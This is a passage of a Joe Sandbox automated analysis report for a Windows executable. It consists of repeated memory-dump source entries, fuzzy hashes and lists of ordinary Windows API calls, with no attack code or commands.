                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 3587649625-0
                                                                                        • Opcode ID: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
                                                                                        • Instruction ID: 88836e5acadc1df971fd8b7d0fb238a00d5eda5c52b9097de5961f667a569525
                                                                                        • Opcode Fuzzy Hash: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
                                                                                        • Instruction Fuzzy Hash: 1391C232B5878594FB14EF24D9442ADA361FF98798FC06132EA4C07AE9DF78D545C310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
                                                                                        • Instruction ID: 923d649cd0bf1c37738be9edca6570929ea386a686020e7cac6e9997cdd38a18
                                                                                        • Opcode Fuzzy Hash: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
                                                                                        • Instruction Fuzzy Hash: 3F41D322F5465294FB00EBB5D9403EDA320AF58BD8F942235EE5D27ADADF38D482C310
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF70E79274D), ref: 00007FF70E7928A9
                                                                                        • GetLastError.KERNEL32(?,00007FF70E79274D), ref: 00007FF70E7928B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                        • Instruction ID: ccfdbcea93f27f52e200a5deba1409aa91a9f3aece22bd969232aaf451845bc4
                                                                                        • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                        • Instruction Fuzzy Hash: 8D31FA22B1999291FA607B76ED40AB4A394AF0CBD4F942131DE1D077B1DF3CE4818360
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1746051919-0
                                                                                        • Opcode ID: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
                                                                                        • Instruction ID: 0f40d791edc09c8a8a229efc1ec2f080e4ae99ee5154a7964b85672a0dd9f208
                                                                                        • Opcode Fuzzy Hash: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
                                                                                        • Instruction Fuzzy Hash: A731E432A1978182EA14AB15F95436EF360EFA8790F806235EB9C07BE6DF3CE440C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlushTime
                                                                                        • String ID:
                                                                                        • API String ID: 1392018926-0
                                                                                        • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                        • Instruction ID: bc4627b32d7140ee0cbef33c2a4cb70cfb572046c68cfefbd724f3d6f293c944
                                                                                        • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                        • Instruction Fuzzy Hash: DF21B522F0DB82A1EA65BE21FC047B697E5AF09794F956031DE4C062A6FF3CD486C210
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID:
                                                                                        • API String ID: 2948472770-0
                                                                                        • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                        • Instruction ID: 8c4ca7988b5176db7e2eb9c9f57dccd281dabfbd0337082082729a3ae45200e7
                                                                                        • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                        • Instruction Fuzzy Hash: 0E115B71B09A5186EA00EF1AEC44169F7A1BF8CFD4F945439CA1DA3720EF7CE5418354
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                        • Instruction ID: 540f0d2466c02d3686948c53d5b1efedca2ed3c52fec4df162f91286a039767d
                                                                                        • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                        • Instruction Fuzzy Hash: 7F116021A0C68291EB60AB25FC40279A260FF59BB4F946331EA7D562E5DF3CE582C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemRectTextWindow$Clientswprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3322643685-0
                                                                                        • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                        • Instruction ID: 90c6ea09ee88172895dc373403d6556752e0d371b6131fcebceadaa8f1ca096f
                                                                                        • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                        • Instruction Fuzzy Hash: FE019220A8968A41FE497B51ED58279E3919F5D745F882076C81D063EAEF2CE884D320
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF70E79EBAD,?,?,?,?,00007FF70E795752,?,?,?,00007FF70E7956DE), ref: 00007FF70E79EB5C
                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF70E79EB6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                        • String ID:
                                                                                        • API String ID: 1231390398-0
                                                                                        • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                        • Instruction ID: bc6b9be9298473fc8dc561fed9aa10d88bf44ed2c30bc532fbd62f4552802d50
                                                                                        • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                        • Instruction Fuzzy Hash: FEE0E561B1458646DB089B65C8409A9A3D2FF8CB40FC4903AD60B83614DF2CE1858B00
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1173176844-0
                                                                                        • Opcode ID: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
                                                                                        • Instruction ID: f4769d952d596a59333f279b46bb87cbeab4fec44f38ec33b792a34b7ff7c68e
                                                                                        • Opcode Fuzzy Hash: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
                                                                                        • Instruction Fuzzy Hash: D0E0E240E0B18B46FD2832669D263F581404F7D3B0ED87B30EEBE486E7AF1CA4928130
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 485612231-0
                                                                                        • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                        • Instruction ID: 6b2a488b9fb11e33dd4a3eb0c8e3ca29b797dd46a5a7e40d4b319c64893f681a
                                                                                        • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                        • Instruction Fuzzy Hash: 5CE0E651E0950346FF287BB2DC452B592959FAC755F846034CA4D86352EF3CA5C58621
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
                                                                                        • Instruction ID: c71a02c81e34e68edf6bd4cb02aacb2e0de3bb1cc7264f9fdd5cb282d9ae821a
                                                                                        • Opcode Fuzzy Hash: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
                                                                                        • Instruction Fuzzy Hash: A4D1DC72B4868165EB28AB29DF402BCE7A1FF29F84F841035CB5D077A5CF38E4618321
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1017591355-0
                                                                                        • Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                                                                                        • Instruction ID: 8758d7300f16198b2a65ee142c7f5ab3463ac78f502db82102e4c3e3ffb9b6e3
                                                                                        • Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                                                                                        • Instruction Fuzzy Hash: 55610411E0C66781FAA6BA35DC1527EE291AF4CBD4FD46131DE4D06AE5EF6CE4428230
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E79E948: ReleaseSemaphore.KERNEL32 ref: 00007FF70E79E974
                                                                                          • Part of subcall function 00007FF70E79E948: CloseHandle.KERNELBASE ref: 00007FF70E79E993
                                                                                          • Part of subcall function 00007FF70E79E948: DeleteCriticalSection.KERNEL32 ref: 00007FF70E79E9AA
                                                                                          • Part of subcall function 00007FF70E79E948: CloseHandle.KERNEL32 ref: 00007FF70E79E9B7
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A1ACB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 904680172-0
                                                                                        • Opcode ID: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
                                                                                        • Instruction ID: b452b3eb869834dd720a795bbe720b4c5a9eb0ecf02d5623462b6a340dc56e8e
                                                                                        • Opcode Fuzzy Hash: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
                                                                                        • Instruction Fuzzy Hash: 5D6182A2716685A1FE08EF65D9541BCB365FF88B90FD85232D76D07AD2CF28E461C310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
                                                                                        • Instruction ID: 53c8c854e5fd6f3452d42711cdd0071bbfd4c71726d7d714a68706494faf61f1
                                                                                        • Opcode Fuzzy Hash: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
                                                                                        • Instruction Fuzzy Hash: 7851B062A4868290FA14BB25ED443A9A751FF9DBD4FC42236EE5D07396CF3DE485C320
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E793EC8: FindClose.KERNEL32(?,?,00000000,00007FF70E7A0811), ref: 00007FF70E793EFD
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78E993
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1011579015-0
                                                                                        • Opcode ID: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
                                                                                        • Instruction ID: e129228c0406bf607f44678296d7e59df79943206b26fe3b4866fd951c7e4331
                                                                                        • Opcode Fuzzy Hash: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
                                                                                        • Instruction Fuzzy Hash: A2519122A4868681FB60EF29DD4537DA361FFA8B84F842136EA8D477A5DF2CD441C321
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 35ea3b04d8214deea48c115844c26589502cb7cbcbac9db44318e90ece9789cf
                                                                                        • Instruction ID: 485d9ab392ad7a27b2406ce90ce9a9f247987ba9f1ce7140b0c6f12c63506b17
                                                                                        • Opcode Fuzzy Hash: 35ea3b04d8214deea48c115844c26589502cb7cbcbac9db44318e90ece9789cf
                                                                                        • Instruction Fuzzy Hash: FF41EA62B19A8241EA14AA27EE40379E251FF48FD0FC59535EE4C47F5ADF7CD4A18300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
